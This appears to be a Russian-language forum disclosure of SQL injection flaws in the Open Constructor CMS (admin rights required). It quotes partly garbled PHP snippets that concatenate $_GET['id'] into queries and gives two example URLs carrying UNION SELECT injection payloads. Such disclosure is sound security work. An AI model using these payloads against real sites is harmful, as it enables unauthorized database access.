
Уязвимости Open Constructor
Тип уязвимости: SQL inj
Зависимости: Права админа
Куски уязвимых кодов:
PHP код:
// NOTE: the left-hand side of this statement was lost in the forum markup; presumably it assigns the result to $res (used on the next line)
query('SELECT id, ds_type, obj_type FROM objects WHERE id=' . $_GET['id']); // $_GET['id'] is concatenated into the SQL string with no validation or escaping — this is the injection point
$obj = mysql_fetch_assoc($res);
mysql_free_result($res);
if ($obj) {
    header('Location: ' . $obj['ds_type'] . '/' . $obj['obj_type'] . '.php?id=' . $obj['id']);
    die();
}
assert(true === false);
?>
PHP код:
load($_GET['ds_id']);
assert($_ds->ds_id > 0);
if ($_GET['id'] == 'new') {
    $pages = &$pr->getAllPages();
    $db = &WCDB::bo();
    $res = $db->query(
        'SELECT id ' .
        'FROM dshtmltext ' .
        'WHERE ds_id = ' . $_ds->ds_id
    );
    while ($r = mysql_fetch_assoc($res))
        unset($pages[$r['id']]);
    mysql_free_result($res);
} else {
    $page = &$pr->getPage($_GET['id']); // raw $_GET['id'] is passed straight through; the second example URL below injects via this parameter, inside code that is not shown here
    assert($page != null);
    $_doc = $_ds->get_record($_GET['id']);
    assert($_doc != null);
}
require_once(LIBDIR . '/syntax/syntaxhighlighter._wc');
$m = array();
preg_match_all('~allowedTags), $m, PREG_PATTERN_ORDER); // the pattern and subject arguments were garbled by the forum markup
$allowed = (array) @$m[1];
$sDoc = $_ds->wrapDocument($_doc);
$save = $_GET['id'] == 'new' ? WCS::decide($_ds, 'createdoc') && sizeof($pages) > 0 : WCS::decide($_ds, 'editdoc') || WCS::decide($sDoc, 'editdoc');
?>
Примеры:
localhost/../objects/edit.php?j=1&id=4%20union%20select%201,2,3--
localhost/../../htmltext/edit.php?ds_id=90&id=36%20union%20select%201,2,3,4 ,5,6,7,8--